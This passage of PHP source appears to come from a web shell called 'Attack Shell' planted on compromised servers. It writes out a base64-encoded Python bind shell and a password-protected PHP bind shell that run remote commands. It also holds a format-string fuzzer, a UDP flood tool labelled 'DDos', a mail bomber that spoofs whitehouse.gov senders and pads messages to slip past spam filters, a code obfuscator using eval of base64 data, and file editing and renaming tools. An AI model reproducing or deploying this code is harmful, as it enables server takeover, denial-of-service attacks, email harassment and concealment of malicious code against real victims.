1606 |             $Python_CODE = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
1607 | 
1608 |             $fd = fopen("bind.py","w");
1609 | 
1610 |             if($fd != FALSE)
1611 |             {
1612 |                 fwrite($fd,base64_decode($Python_CODE));
1613 | 
1614 |                 if($os == "Linux")
1615 |                 {
1616 |                     echo "[+] OS Detected = Windows";
1617 |                     exec_all("chmod +x bind.py ; ./bind.py");
1618 | 
1619 |                     // CHeck if the process is running
1620 | 
1621 |                     $pattern = "bind.py";
1622 | 
1623 |                     $list = exec_all("ps -aux");
1624 |                 }
1625 |                 else
1626 |                 {
1627 |                     echo "[+] OS Detected = Windows";
1628 |                     exec_all("start bind.py");
1629 |                     // CHeck if the process is running
1630 | 
1631 |                     $pattern = "python.exe";
1632 | 
1633 |                     $list = exec_all("TASKLIST");
1634 |                 }
1635 | 
1636 | 
1637 |                 if(preg_match("/$pattern/",$list))
1638 |                 {
1639 |                         echo "<p class='alert_green'>Process Found Running! Backdoor Setup Completed! :D</p>";
1640 |                 }
1641 |                 else
1642 |                 {
1643 |                     echo "<p class='alert_red'>Process Not Found Running! Backdoor Setup FAILED! :(</p>";
1644 |                 }
1645 | 
1646 |                 echo "<br /><br />\n<b>Task List :-</b> <pre>\n$list</pre>";
1647 | 
1648 |             }
1649 |         }
1650 |     }
1651 |     else if($_POST['mode'] == "PHP")
1652 |     {
1653 | 
1654 |         // Set time limit to indefinite execution
1655 |         set_time_limit (0);
1656 | 
1657 | 
1658 |         // Set the ip and port we will listen on
1659 | 
1660 | 
1661 |         if(function_exists("socket_create"))
1662 |         {
1663 |         // Create a TCP Stream socket
1664 |         $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
1665 | 
1666 | 
1667 |         // Bind the socket to an address/port
1668 | 
1669 | 
1670 |         if(socket_bind($sockfd, $address, $port) == FALSE)
1671 |         {
1672 |             echo "Cant Bind to the specified port and address!";
1673 |         }
1674 |         // Start listening for connections
1675 |         socket_listen($sockfd,15);
1676 | 
1677 | 
1678 |         $passwordPrompt = "\n=================================================================\nAttack Shell\n=================================================================\n\n0xPassword : ";
1679 | 
1680 |         /* Accept incoming requests and handle them as child processes */
1681 |         $client = socket_accept($sockfd);
1682 | 
1683 | 
1684 |         socket_write($client , $passwordPrompt);
1685 |         // Read the pass from the client
1686 |         $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
1687 |         if(trim($input) == $pass)
1688 |         {
1689 |             socket_write($client , "\n\n");
1690 |             socket_write($client , ($os == "Windows") ? exec_all("date /t & time /t")  . "\n" . exec_all("ver") : exec_all("date") . "\n" . exec_all("uname -a"));
1691 |             socket_write($client , "\n\n");
1692 |             while(1)
1693 |             {
1694 |                 // Print Command prompt
1695 |                 $commandPrompt ="(attack-Shell)[$]> ";
1696 |                 $maxCmdLen = 31337;
1697 |                 socket_write($client,$commandPrompt);
1698 |                 $cmd = socket_read($client,$maxCmdLen);
1699 |                 if($cmd == FALSE)
1700 |                 {
1701 |                     echo "The client Closed the conection!";
1702 |                     break;
1703 |                 }
1704 |                 socket_write($client , exec_all($cmd));
1705 |             }
1706 |         }
1707 |         else
1708 |         {
1709 |             echo "Wrong Password!";
1710 |             socket_write($client, "sU(|< - 0FF Bitch!\n\n");
1711 |         }
1712 |         socket_shutdown($client, 2);
1713 |         socket_close($socket);
1714 | 
1715 |         // Close the client (child) socket
1716 |         //socket_close($client);
1717 |         // Close the master sockets
1718 |         //socket_close($sock);
1719 |         }
1720 |         else
1721 |         {
1722 |             echo "Socket Conections not Allowed/Supported by the server! <br />";
1723 |         }
1724 |     }
1725 |     else
1726 |     {
1727 |     ?>
1728 |     <table class="bind" align="center" >
1729 |     <tr>
1730 |         <th class="header" colspan="1" width="50px">Back Connect</th>
1731 |         <th class="header" colspan="1" width="50px">Bind Shell</th>
1732 |     </tr>
1733 |     <tr>
1734 |         <form method='POST' >
1735 |          <td>
1736 |             <table style="border-spacing: 6px;">
1737 |                 <tr>
1738 |                     <td>IP </td>
1739 |                     <td>
1740 |                         <input style="width: 200px;" class="cmd" name="ip" value="<?php getClientIp();?>" />
1741 |                     </td>
1742 |                 </tr>
1743 |                 <tr>
1744 |                     <td>Port </td>
1745 |                     <td><input style="width: 100px;" class="cmd" name="port" size='5' value="31337"/></td>
1746 |                 </tr>
1747 |                 <tr>
1748 |                 <td>Mode </td>
1749 |                 <td>
1750 |                         <select name="mode" class="cmd">
1751 |                             <option value="PHP">PHP</option>
1752 |                         </select>&nbsp;&nbsp;<input style="width: 90px;" class="own" type="submit" value="Connect!"/></td>
1753 | 
1754 |             </table>
1755 |          </td>
1756 |          </form>
1757 |          <form method="POST">
1758 |          <td>
1759 |             <table style="border-spacing: 6px;">
1760 |                 <tr>
1761 |                     <td>Port</td>
1762 |                     <td>
1763 |                         <input style="width: 200px;" class="cmd" name="port" value="31337" />
1764 |                     </td>
1765 |                 </tr>
1766 |                 <tr>
1767 |                     <td>Passwd </td>
1768 |                     <td><input style="width: 100px;" class="cmd" name="passwd" size='5' value="12345678"/>
1769 |                 </tr>
1770 |                 <tr>
1771 |                 <td>
1772 |                 Mode
1773 |                 </td>
1774 |                 <td>
1775 |                         <select name="mode" class="cmd">
1776 |                             <option value="PHP">PHP</option>
1777 |                             <option value="Python">Python</option>
1778 |                         </select> &nbsp;&nbsp;<input style="width: 90px;" class="own" type="submit" value="Bind :D!"/></td>
1779 |                 </tr>
1780 | 
1781 |             </table>
1782 |          </td>
1783 |          </form>
1784 |     </tr>
1785 |     </table>
1786 |     <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
1787 | <?php
1788 |     }
1789 | }
1790 | 
1791 | //fuzzer
1792 | 
1793 | else if(isset($_GET['fuzz']))
1794 | {
1795 |     if(isset($_GET['ip']) &&
1796 |     isset($_GET['port']) &&
1797 |     isset($_GET['times']) &&
1798 |     isset($_GET['time']) &&
1799 |     isset($_GET['message']) &&
1800 |     isset($_GET['messageMultiplier']) &&
1801 |     $_GET['message'] != "" &&
1802 |     $_GET['time'] != "" &&
1803 |     $_GET['times'] != "" &&
1804 |     $_GET['port'] != "" &&
1805 |     $_GET['ip'] != "" &&
1806 |     $_GET['messageMultiplier'] != ""
1807 |     )
1808 |     {
1809 |        $IP=$_GET['ip'];
1810 | 	   $port=$_GET['port'];
1811 |        $times = $_GET['times'];
1812 | 	   $timeout = $_GET['time'];
1813 | 	   $send = 0;
1814 |        $ending = "";
1815 |        $multiplier = $_GET['messageMultiplier'];
1816 |        $data = "";
1817 |        $mode="tcp";
1818 |        $data .= "GET /";
1819 |        $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
1820 |         if($_GET['type'] == "tcp")
1821 |         {
1822 |             $mode = "tcp";
1823 |         }
1824 |         while($multiplier--)
1825 |         {
1826 |             $data .= urlencode($_GET['message']);
1827 |         }
1828 |         $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
1829 |         $data .= "by-attack-shell".$ending;
1830 |         $length = strlen($data);
1831 | 
1832 | 
1833 |        echo "Sending Data :- <br /> <p align='center'>$data</p>";
1834 | 
1835 |        print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
1836 | 	   for($i=0;$i<$times;$i++)
1837 | 	   {
1838 |             $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
1839 |             if($socket)
1840 |             {
1841 |                 fwrite($socket , $data , $length );
1842 |                 fclose($socket);
1843 |             }
1844 |         }
1845 |         echo "<script>alert('Fuzzing Completed!');</script>";
1846 |         echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
1847 |         echo "Total Number of Packets Sent : " . $times . "<br />";
1848 |         echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
1849 |         echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
1850 |     }
1851 |     else
1852 |     {
1853 |         ?>
1854 |         <form method="GET">
1855 |             <input type="hidden" name="fuzz" />
1856 |             <table id="margins">
1857 |                 <tr>
1858 |                     <td width="400" class="title">
1859 |                         IP
1860 |                     </td>
1861 |                     <td>
1862 |                         <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
1863 |                     </td>
1864 |                 </tr>
1865 | 
1866 |                 <tr>
1867 |                     <td class="title">
1868 |                         Port
1869 |                     </td>
1870 |                     <td>
1871 |                         <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
1872 |                     </td>
1873 |                 </tr>
1874 | 
1875 |                 <tr>
1876 |                     <td class="title">
1877 |                         Timeout
1878 |                     </td>
1879 |                     <td>
1880 |                         <input type="text" class="cmd" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
1881 |                     </td>
1882 |                 </tr>
1883 | 
1884 | 
1885 |                 <tr>
1886 |                     <td class="title">
1887 |                         No of times
1888 |                     </td>
1889 |                     <td>
1890 |                         <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
1891 |                     </td>
1892 |                 </tr>
1893 | 
1894 |                 <tr>
1895 |                     <td class="title">
1896 |                         Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
1897 |                     </td>
1898 |                     <td>
1899 |                         <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
1900 |                     </td>
1901 |                     <td>
1902 |                         x
1903 |                     </td>
1904 |                     <td width="20">
1905 |                         <input style="width: 30px;" class="cmd" name="messageMultiplier" value="10" />
1906 |                     </td>
1907 |                 </tr>
1908 | 
1909 |                 <tr>
1910 |                     <td rowspan="2">
1911 |                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it Rip! :D"/>
1912 |                     </td>
1913 |                 </tr>
1914 |             </table>
1915 |         </form>
1916 |         <?php
1917 |     }
1918 | }
1919 | 
1920 | 
1921 | //DDos
1922 | 
1923 | else if(isset($_GET['dos']))
1924 | {
1925 |     if(isset($_GET['ip']) &&
1926 |     isset($_GET['exTime']) &&
1927 |     isset($_GET['port']) &&
1928 |     isset($_GET['timeout']) &&
1929 |     isset($_GET['exTime']) &&
1930 |     $_GET['exTime'] != "" &&
1931 |     $_GET['port'] != "" &&
1932 |     $_GET['ip'] != "" &&
1933 |     $_GET['timeout'] != "" &&
1934 |     $_GET['exTime'] != ""
1935 |     )
1936 |     {
1937 |        $IP=$_GET['ip'];
1938 | 	   $port=$_GET['port'];
1939 |        $executionTime = $_GET['exTime'];
1940 | 	   $noOfBytes = $_GET['noOfBytes'];
1941 |        $data = "";
1942 |        $timeout = $_GET['timeout'];
1943 |        $packets = 0;
1944 |        $counter = $noOfBytes;
1945 |        $maxTime = time() + $executionTime;;
1946 |        while($counter--)
1947 |        {
1948 |             $data .= "X";
1949 |        }
1950 |        $data .= "-by-attack-Shell";
1951 |        print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
1952 | 
1953 |        while(1)
1954 | 	   {
1955 |             $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
1956 |             if($socket)
1957 |             {
1958 |                 fwrite($socket , $data);
1959 |                 fclose($socket);
1960 |                 $packets++;
1961 |             }
1962 |             if(time() >= $maxTime)
1963 |             {
1964 |                 break;
1965 |             }
1966 |         }
1967 |         echo "<script>alert('DDos Completed!');</script>";
1968 |         echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
1969 |         echo "Total Number of Packets Sent : " . $packets . "<br />";
1970 |         echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
1971 |         echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
1972 |     }
1973 |     else
1974 |     {
1975 | 
1976 |         ?>
1977 |         <form method="GET">
1978 |             <input type="hidden" name="dos" />
1979 |             <table id="margins">
1980 |                 <tr>
1981 |                     <td width="400" class="title">
1982 |                         IP
1983 |                     </td>
1984 |                     <td>
1985 |                         <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
1986 |                     </td>
1987 |                 </tr>
1988 | 
1989 |                 <tr>
1990 |                     <td class="title">
1991 |                         Port
1992 |                     </td>
1993 |                     <td>
1994 |                         <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
1995 |                     </td>
1996 |                 </tr>
1997 | 
1998 |                 <tr>
1999 |                     <td class="title">
2000 |                         Timeout <font color="red">(Time in seconds)</font>
2001 |                     </td>
2002 |                     <td>
2003 |                         <input type="text" class="cmd" name="timeout" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';" />
2004 |                     </td>
2005 |                 </tr>
2006 | 
2007 | 
2008 |                 <tr>
2009 |                     <td class="title">
2010 |                         Execution Time <font color="red">(Time in seconds)</font>
2011 |                     </td>
2012 |                     <td>
2013 |                         <input type="text" class="cmd" name="exTime" value="10" onfocus="if(this.value == '10')this.value = '';" onblur="if(this.value=='')this.value='10';"/>
2014 |                     </td>
2015 |                 </tr>
2016 | 
2017 |                 <tr>
2018 |                     <td class="title">
2019 |                         No of Bytes per/packet
2020 |                     </td>
2021 |                     <td>
2022 |                         <input type="text" class="cmd" name="noOfBytes" value="999999" onfocus="if(this.value == '999999')this.value = '';" onblur="if(this.value=='')this.value='999999';"/>
2023 |                     </td>
2024 |                 </tr>
2025 | 
2026 | 
2027 |                 <tr>
2028 |                     <td rowspan="2">
2029 |                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it Rip! :D"/>
2030 |                     </td>
2031 |                 </tr>
2032 |             </table>
2033 |         </form>
2034 |         <?php
2035 |     }
2036 | }
2037 | 
2038 | // Mail Bomber
2039 | 
2040 | else if(isset($_GET['bomb']))
2041 | {
2042 |     if(
2043 |         isset($_GET['to']) &&
2044 |         isset($_GET['subject']) &&
2045 |         isset($_GET['message']) &&
2046 |         isset($_GET['times']) &&
2047 |         $_GET['to'] != '' &&
2048 |         $_GET['subject'] != '' &&
2049 |         $_GET['message'] != '' &&
2050 |         $_GET['times'] != ''
2051 |     )
2052 |     {
2053 |         $times = $_GET['times'];
2054 |         while($times--)
2055 |         {
2056 |             if(isset($_GET['padding']))
2057 |             {
2058 |                 $fromPadd = rand(0,9999);
2059 |                 $subjectPadd = " -- ID : ".rand(0,9999999);
2060 |                 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2061 | 
2062 |             }
2063 |             $from = "president$fromPadd@whitehouse.gov";
2064 |             if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
2065 |             {
2066 |                 $error = 1;
2067 |                 echo "<p class='alert_red'>Some Error Occured!</p>";
2068 |                 break;
2069 |             }
2070 |         }
2071 |         if($error != 1)
2072 |         {
2073 |             echo "<p class='alert_green'>Mail(s) Sent!</p>";
2074 |         }
2075 |     }
2076 |     else
2077 |     {
2078 |         ?>
2079 |         <form method="GET">
2080 |             <input type="hidden" name="bomb" />
2081 |             <table id="margins">
2082 |                 <tr>
2083 |                     <td class="title">
2084 |                         To
2085 |                     </td>
2086 |                     <td>
2087 |                         <input class="cmd" name="to" value="victim@domain.com,victim2@domain.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
2088 |                     </td>
2089 |                 </tr>
2090 | 
2091 |                 <tr>
2092 |                     <td class="title">
2093 |                         Subject
2094 |                     </td>
2095 |                     <td>
2096 |                         <input type="text" class="cmd" name="subject" value="Just testing my Fucking Skillz!" onfocus="if(this.value == 'Just testing my Fucking Skillz!')this.value = '';" onblur="if(this.value=='')this.value='Just testing my Fucking Skillz!';" />
2097 |                     </td>
2098 |                 </tr>
2099 |                  <tr>
2100 |                     <td class="title">
2101 |                         No. of Times
2102 |                     </td>
2103 |                     <td>
2104 |                         <input class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
2105 |                     </td>
2106 |                 </tr>
2107 | 
2108 |                 <tr>
2109 |                     <td>
2110 | 
2111 |                         Pad your message (Less spam detection)
2112 | 
2113 |                     </td>
2114 |                     <td>
2115 | 
2116 |                         <input type="checkbox" name="padding"/>
2117 | 
2118 |                     </td>
2119 |                 </tr>
2120 |                 <tr>
2121 |                     <td colspan="2">
2122 |                         <textarea name="message" cols="110" rows="10" class="cmd">Attack Shell Rocks!!</textarea>
2123 |                     </td>
2124 |                 </tr>
2125 | 
2126 | 
2127 |                 <tr>
2128 |                     <td rowspan="2">
2129 |                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Send! :D"/>
2130 |                     </td>
2131 |                 </tr>
2132 |             </table>
2133 |         </form>
2134 |         <?php
2135 |     }
2136 | }
2137 | 
2138 | //Mass Mailer
2139 | 
2140 | else if(isset($_GET['mail']))
2141 | {
2142 |     if(
2143 |         isset($_GET['to']) &&
2144 |         isset($_GET['from']) &&
2145 |         isset($_GET['subject']) &&
2146 |         isset($_GET['message'])
2147 |     )
2148 |     {
2149 | 
2150 |         if(mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']))
2151 |         {
2152 |             echo "<p class='alert_green'>Mail Sent!</p>";
2153 |         }
2154 |         else
2155 |         {
2156 |             echo "<p class='alert_red'>Some Error Occured!</p>";
2157 |         }
2158 |     }
2159 |     else
2160 |     {
2161 |         ?>
2162 |         <form method="GET">
2163 |             <input type="hidden" name="mail" />
2164 |             <table id="margins">
2165 |                 <tr>
2166 |                     <td width="100" class="title">
2167 |                         From
2168 |                     </td>
2169 |                     <td>
2170 |                         <input class="cmd" name="from" value="president@whitehouse.gov" onfocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onblur="if(this.value=='')this.value='president@whitehouse.gov';"/>
2171 |                     </td>
2172 |                 </tr>
2173 | 
2174 |                 <tr>
2175 |                     <td class="title">
2176 |                         To
2177 |                     </td>
2178 |                     <td>
2179 |                         <input class="cmd" name="to" value="victim@domain.com,victim2@domain.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
2180 |                     </td>
2181 |                 </tr>
2182 | 
2183 |                 <tr>
2184 |                     <td class="title">
2185 |                         Subject
2186 |                     </td>
2187 |                     <td>
2188 |                         <input type="text" class="cmd" name="subject" value="Just testing my Fucking Skillz!" onfocus="if(this.value == 'Just testing my Fucking Skillz!')this.value = '';" onblur="if(this.value=='')this.value='Just testing my Fucking Skillz!';" />
2189 |                     </td>
2190 |                 </tr>
2191 | 
2192 | 
2193 |                 <tr>
2194 |                     <td colspan="2">
2195 |                         <textarea name="message" cols="110" rows="10" class="cmd">All i remember are those lonely nights when i was defacing those insecure websites!</textarea>
2196 |                     </td>
2197 |                 </tr>
2198 | 
2199 | 
2200 |                 <tr>
2201 |                     <td rowspan="2">
2202 |                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Send! :D"/>
2203 |                     </td>
2204 |                 </tr>
2205 |             </table>
2206 |         </form>
2207 |         <?php
2208 |     }
2209 | }
2210 | 
2211 | 
2212 | // Edit File
2213 | 
2214 | else if(isset($_POST['file']) &&
2215 |         isset($_POST['content']) )
2216 | {
2217 |     if(is_dir($_POST['file']))
2218 |     {
2219 |         header("location:".$self."?dir=".$_POST['file']);
2220 |     }
2221 |     if(file_exists($_POST['file']))
2222 |     {
2223 |         $handle = fopen($_POST['file'],"w");
2224 | 	if (!handle) echo "<p class='alert_red'>Permission Denied</p>";
2225 | 	else {
2226 |         	fwrite($handle,$_POST['content']);
2227 |         	echo "Your changes were Successfully Saved!";
2228 |         }
2229 |     }
2230 |     else
2231 |     {
2232 |         echo "<p class='alert_red'>File Name Specified does not exists!</p>";
2233 |     }
2234 | }
2235 | 
2236 | // PHP Obfuscator
2237 | 
2238 | else if(isset($_GET['obfuscate']))
2239 | {
2240 |     if ( isset($_POST['code']) &&
2241 |                $_POST['code'] != '')
2242 |     {
2243 |         $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
2244 |         $encode = '
2245 | <?php
2246 | $encoded = \''.$encoded.'\';
2247 | eval(gzinflate(base64_decode($encoded)));
2248 | // Script Encoded by attack-Shell
2249 | ?>
2250 | ';
2251 |     }
2252 |     else
2253 |     {
2254 |         $encode = 'Please Enter your Code! and Click Submit! :)';
2255 |     }?>
2256 |     <form method="POST">
2257 |         <textarea class="cmd" cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
2258 |         <input style="margin: 20px; margin-left: 50px; padding: 10px;"  class="own"  type="submit" value="Encode :D"/>
2259 |     </form>
2260 | 
2261 |     <?php
2262 | }
2263 | 
2264 | //open file
2265 | 
2266 | else if(isset($_GET['open']))
2267 | {
2268 |     ?>
2269 | 	</center>
2270 |         <form method="POST" action="<?php echo $self;?>" >
2271 |         <table>
2272 |             <tr>
2273 |                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['open'];?>" class="cmd" name="file" /></td>
2274 |             </tr>
2275 |             <tr>
2276 |                 <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']);?>" class="cmd" /></td>
2277 |             </tr>
2278 |         </table>
2279 |         <textarea name="content" rows="20" cols="60" class="cmd"><?php
2280 |         $content = htmlspecialchars(file_get_contents($_GET['open']));
2281 |         if($content)
2282 |         {
2283 |             echo $content;
2284 |         }
2285 |         else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2286 |         {
2287 |             $fd = fopen($_GET['open']);
2288 | 	    if (!$fd) echo "<p class='alert_red'>Permission Denied</p>";
2289 | 	    else {
2290 |             while(!feof())
2291 |             {
2292 |                 echo htmlspecialchars(fgets($fd));
2293 |             }
2294 |             }
2295 |         }
2296 | 
2297 |         ?>
2298 |         </textarea><br />
2299 |         <input name="save" type="Submit" value="Save Changes" class="own" id="spacing"/>
2300 |         </form>
2301 |     <?php
2302 | }
2303 | 
2304 | //Rename
2305 | 
2306 | else if(isset($_GET['rename']))
2307 | {
2308 |     if(isset($_GET['to']) && isset($_GET['rename']))
2309 |     {
2310 |         if(rename($_GET['rename'],$_GET['to']) == FALSE)
2311 |         {
2312 |             ?>
2313 |             <big><p class="blink">Cant rename the file specified! Please check the file-name , Permissions and try again!</p></big>
2314 |             <?php
2315 |         }
2316 |         else
2317 |         {
2318 |             ?>
2319 |             <big><p class="blink">File Renamed , Return <a href="<?php echo $self;?>">Here</a></p></big>
2320 |             <?php
2321 |         }
2322 |     }
2323 |     else
2324 |     {
2325 | ?>
2326 |     <form method="GET" action="<?php echo $self;?>" >
2327 |         <table>
2328 |             <tr>
2329 |                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" class="cmd" name="rename" /></td>
2330 |             </tr>
2331 |             <tr>
2332 |                 <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" class="cmd" name="to" /></td>
2333 |             </tr>
2334 |         </table>
2335 |         <input type="Submit" value="Rename :D" class="own" style="margin-left: 160px;padding: 5px;"/>
2336 |         </form>
2337 |     <?php
2338 |     }
2339 | }
2340 | // No request made
2341 | // Display home page
2342 | 
2343 | else
2344 | {
2345 |     echo "    </center>";
2346 |     $dir = getcwd();
2347 |     if(isset($_GET['dir']))
2348 |     {
2349 |         $dir = $_GET['dir'];
2350 |     }
2351 |     ?>
2352 |     <table id="margins">
2353 |     <tr>
2354 |         <form method="GET" action="<?php echo $self;?>">
2355 |         <td width="100">PWD</td><td width="410"><input name="dir" class="cmd" id="mainInput" value="<?php echo $dir;?>"/></td>
2356 |         <td><input type="submit" value="GO" class="own" /></td>
2357 |         </form>
2358 |     </tr>
2359 |     </table>
2360 | 
2361 |     <table id="margins" class="files">
2362 |     <tr>
